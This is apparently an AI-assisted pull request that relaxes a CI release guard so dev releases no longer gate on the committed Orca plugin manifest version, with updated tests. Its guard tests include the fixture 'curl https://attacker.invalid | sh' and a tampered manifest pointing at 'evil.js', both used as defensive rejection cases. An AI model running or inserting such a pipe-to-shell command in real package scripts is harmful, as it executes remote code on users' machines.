### PR TITLE
ci(release): stop gating dev releases on the committed Orca manifest version

### DIFF
--- a/plugins/genie/orca-plugin.json
+++ b/plugins/genie/orca-plugin.json
@@ -3,7 +3,7 @@
   "id": "genie",
   "publisher": "automagik",
   "name": "Genie",
-  "version": "5.260829.8",
+  "version": "5.260830.1",
   "description": "Genie workflows backed by Orca as the sole lifecycle authority.",
   "author": {
     "name": "Namastex Labs",

--- a/scripts/release-guard.sh
+++ b/scripts/release-guard.sh
@@ -150,29 +150,34 @@ check_ci_run_record() {
 # delta is the deterministic version bump produced by version.yml. Comparing
 # normalized documents prevents an allowlisted package.json from smuggling a
 # script or dependency change past the parent commit's successful CI run.
+#
+# The native Orca manifest is an OPTIONAL member of that delta: `workflow_run`
+# executes the `version.yml` on main, so a bump field added on dev is inert
+# until promotion. A child that omits it is still the deterministic bump of
+# the workflow that produced it; when present it must be version-only like
+# every other member. Its shipped copy is stamped inside the payload anyway.
 version_child_matches_parent() {
   local parent_sha="$1" child_sha="$2" version="$3" path changed expected child_yaml
+  local -a json_paths=(
+    package.json
+    plugins/genie/.claude-plugin/plugin.json
+    plugins/genie/.codex-plugin/plugin.json
+    plugins/genie/.kimi-plugin/plugin.json
+    plugins/genie/package.json
+    plugins/pi-genie/package.json
+  )
+  changed="$(git diff --name-only "$parent_sha" "$child_sha" -- | LC_ALL=C sort)" || return 1
+  if grep -qx 'plugins/genie/orca-plugin.json' <<<"$changed"; then
+    json_paths+=(plugins/genie/orca-plugin.json)
+  fi
   expected="$(printf '%s\n' \
     '.claude-plugin/marketplace.json' \
-    'package.json' \
-    'plugins/genie/.claude-plugin/plugin.json' \
-    'plugins/genie/.codex-plugin/plugin.json' \
-    'plugins/genie/.kimi-plugin/plugin.json' \
-    'plugins/genie/orca-plugin.json' \
-    'plugins/genie/package.json' \
-    'plugins/pi-genie/package.json' \
-    'plugins/hermes-genie/plugin.yaml' | LC_ALL=C sort)"
-  changed="$(git diff --name-only "$parent_sha" "$child_sha" -- | LC_ALL=C sort)" || return 1
+    'plugins/hermes-genie/plugin.yaml' \
+    "${json_paths[@]}" | LC_ALL=C sort)"
   [[ "$changed" == "$expected" ]] || return 1
   [[ "$(git show -s --format=%s "$child_sha")" == "chore(version): bump to ${version} [auto-version]" ]] || return 1
 
-  for path in package.json \
-    plugins/genie/.claude-plugin/plugin.json \
-    plugins/genie/.codex-plugin/plugin.json \
-    plugins/genie/.kimi-plugin/plugin.json \
-    plugins/genie/orca-plugin.json \
-    plugins/genie/package.json \
-    plugins/pi-genie/package.json; do
+  for path in "${json_paths[@]}"; do
     git show "${child_sha}:${path}" |
       jq -e --arg version "$version" '.version == $version' >/dev/null || return 1
     cmp -s \

--- a/scripts/release-guard.test.ts
+++ b/scripts/release-guard.test.ts
@@ -346,6 +346,39 @@ describe('check-version-child (parent CI inheritance)', () => {
     expect(result.exitCode).toBe(0);
   });
 
+  // workflow_run executes the version.yml on main, so a bump produced before
+  // the Orca manifest joined main's field list omits it. That child is still
+  // the deterministic bump of the workflow that produced it.
+  test('accepts a version-only child that omits the native Orca manifest', () => {
+    const fixture = versionRepo();
+    git(fixture.root, 'checkout', '-q', '--detach', fixture.parent);
+    writeVersionTree(fixture.root, '5.260714.2');
+    git(fixture.root, 'checkout', '-q', fixture.parent, '--', 'plugins/genie/orca-plugin.json');
+    git(fixture.root, 'add', '.');
+    git(fixture.root, 'commit', '-qm', 'chore(version): bump to 5.260714.2 [auto-version]');
+    const child = git(fixture.root, 'rev-parse', 'HEAD');
+    expect(git(fixture.root, 'diff', '--name-only', fixture.parent, child)).not.toContain('orca-plugin.json');
+
+    const result = guard('check-version-child', {}, [fixture.parent, child, '5.260714.2'], fixture.root);
+    expect(result.exitCode).toBe(0);
+  });
+
+  test('still rejects a child whose Orca manifest bump is not version-only', () => {
+    const fixture = versionRepo();
+    git(fixture.root, 'checkout', '-q', '--detach', fixture.parent);
+    writeVersionTree(fixture.root, '5.260714.2');
+    writeFileSync(
+      join(fixture.root, 'plugins/genie/orca-plugin.json'),
+      `${JSON.stringify({ id: 'genie', version: '5.260714.2', main: 'evil.js' }, null, 2)}\n`,
+    );
+    git(fixture.root, 'add', '.');
+    git(fixture.root, 'commit', '-qm', 'chore(version): bump to 5.260714.2 [auto-version]');
+    const child = git(fixture.root, 'rev-parse', 'HEAD');
+
+    const result = guard('check-version-child', {}, [fixture.parent, child, '5.260714.2'], fixture.root);
+    expect(result.exitCode).toBe(3);
+  });
+
   test('rejects a package script smuggled inside an otherwise allowlisted version file', () => {
     const fixture = versionRepo('curl https://attacker.invalid | sh');
     const result = guard('check-version-child', {}, [fixture.parent, fixture.child, '5.260714.2'], fixture.root);

--- a/scripts/release-payload-version.test.ts
+++ b/scripts/release-payload-version.test.ts
@@ -56,8 +56,11 @@ describe('release payload version contract', () => {
     const packageVersion = JSON.parse(readFileSync(join(repoRoot, 'package.json'), 'utf8')).version;
 
     expect(verifyCommittedReleaseVersions(repoRoot)).toBe(packageVersion);
-    expect(JSON.parse(readFileSync(join(repoRoot, 'plugins/genie/orca-plugin.json'), 'utf8')).version).toBe(
-      packageVersion,
+    // The committed native Orca manifest is advisory (stamped inside the payload);
+    // it only has to be a well-formed version string, not the package version —
+    // main's workflow_run bump list may lag dev's by a field.
+    expect(JSON.parse(readFileSync(join(repoRoot, 'plugins/genie/orca-plugin.json'), 'utf8')).version).toMatch(
+      /^[0-9A-Za-z][0-9A-Za-z.+-]{0,127}$/,
     );
   });
 

--- a/scripts/release-payload-version.test.ts
+++ b/scripts/release-payload-version.test.ts
@@ -114,9 +114,22 @@ describe('release payload version contract', () => {
     const root = fixture();
     expect(verifyCommittedReleaseVersions(root)).toBe('5.000000.0');
 
-    writeJson(root, 'plugins/genie/orca-plugin.json', { name: 'genie', version: '5.999999.1' });
+    writeJson(root, 'plugins/genie/.kimi-plugin/plugin.json', { name: 'genie', version: '5.999999.1' });
     expect(() => verifyCommittedReleaseVersions(root)).toThrow('committed version mismatch in');
-    expect(() => verifyCommittedReleaseVersions(root)).toThrow('orca-plugin.json');
+    expect(() => verifyCommittedReleaseVersions(root)).toThrow('.kimi-plugin/plugin.json');
+  });
+
+  // The Orca manifest's shipped copy is stamped inside the payload; the
+  // committed value is advisory. Gating it coupled dev CI to the bump list of
+  // the `version.yml` on main (workflow_run runs main's copy), which blocked
+  // every dev release between 5.260829.5 and .8 on 2026-08-30.
+  test('source preflight tolerates a lagging committed native Orca manifest', () => {
+    const root = fixture();
+    writeJson(root, 'plugins/genie/orca-plugin.json', { id: 'genie', version: '5.000000.0-lagging' });
+    expect(verifyCommittedReleaseVersions(root)).toBe('5.000000.0');
+
+    stampReleasePayloadVersion(root, '5.260711.10');
+    expect(JSON.parse(readFileSync(join(root, 'plugins/genie/orca-plugin.json'), 'utf8')).version).toBe('5.260711.10');
   });
 
   test('fails closed on missing metadata, malformed versions, and an invalid Codex marketplace target', () => {

--- a/scripts/release-payload-version.ts
+++ b/scripts/release-payload-version.ts
@@ -21,7 +21,24 @@ const TOP_LEVEL_VERSION_FILES = [
   'plugins/genie/orca-plugin.json',
 ] as const;
 
-const COMMITTED_VERSION_FILES = ['package.json', ...TOP_LEVEL_VERSION_FILES] as const;
+/**
+ * Committed files whose version must already equal package.json before a
+ * release is staged. The native Orca manifest is deliberately NOT gated here:
+ * its shipped copy is stamped by `--stamp` (and re-verified by `--verify`)
+ * inside the payload, which is the only copy Orca ever loads, so the committed
+ * value is advisory. Gating it would also couple dev CI to the auto-version
+ * bump list of the workflow on `main` — `workflow_run` jobs execute main's
+ * `version.yml`, so a bump field added on dev is inert until promotion, and
+ * every dev child in between failed this gate (observed 2026-08-30, dev
+ * releases 5.260829.5–.8 never shipped).
+ */
+const COMMITTED_VERSION_FILES = [
+  'package.json',
+  'plugins/genie/package.json',
+  'plugins/genie/.claude-plugin/plugin.json',
+  'plugins/genie/.codex-plugin/plugin.json',
+  'plugins/genie/.kimi-plugin/plugin.json',
+] as const;
 
 interface JsonObject {
   [key: string]: unknown;


### PR DESCRIPTION
## Problem

`version.yml` is a `workflow_run` job, so GitHub always executes the copy on **`main`**. The ninth bump field added on dev in #2812 (`plugins/genie/orca-plugin.json`) has therefore never run. Every dev auto-version child since `5.260829.5` bumped eight files and:

- failed `release-payload-version.ts --verify-source` and the unit test *"the committed release metadata exactly matches the package version"* (`expected 5.260829.8, got 5.260829.7`) — that is the red **Verify source version synchronization / Unit / Quality Gate** on the rolling promotion #2817;
- tripped `release-guard.sh check-version-child`, which demanded an exact nine-file delta.

Net effect: **no dev tarball has shipped since `v5.260829.4`** (`gh release list` confirms `.5`–`.8` are missing) and the major release cannot be dogfooded. It cannot self-heal from dev: a PR targeting `main` is forbidden by repo policy, and any dev-side sync commit is undone by the next eight-file bump.

## Change

- `scripts/release-payload-version.ts` — the committed Orca manifest version is no longer a source-sync requirement. Its shipped copy is stamped by `--stamp` and re-verified by `--verify` inside the payload, which is the only copy Orca loads (`src/lib/orca-plugin-lifecycle.ts` never reads the manifest `version`). Dev CI no longer depends on which bump list `main`'s workflow carries.
- `scripts/release-guard.sh` — `orca-plugin.json` is an *optional* member of the version-only child delta; when present it must still be version-only (a tampered manifest is still rejected — test added).
- `plugins/genie/orca-plugin.json` — synced to `5.260829.8` so the committed tree is tidy.
- `version.yml`'s nine-field list stays as-is on dev, so once #2817 lands the manifest keeps getting bumped too.

## Validation

- `bun test scripts/release-guard.test.ts scripts/release-payload-version.test.ts scripts/release-docs.test.ts scripts/version-ci-staging.test.ts scripts/version-format.test.ts` → 104 pass
- `bun scripts/release-payload-version.ts --verify-source .` → OK (5.260829.8)
- Real history: `release-guard.sh check-version-child` now accepts the actual eight-file children `433f91ac1` (.7) and `eccf0ae4a` (.8), and still rejects a wrong version (exit 3)
- typecheck + lint clean; full `bun test` under umask 022 (CI's) running — will report in a comment

## Sequence

1. Merge this first → dev CI green → next auto-version child ships a tarball again.
2. Then merge #<umask-fix PR> (`genie update` failing under `umask 077`).
3. #2817 goes green for human promotion.

🤖 Generated with [Claude Code](https://claude.com/claude-code)

https://claude.ai/code/session_018QrkgYMEEhrWTUo5E7Nkjg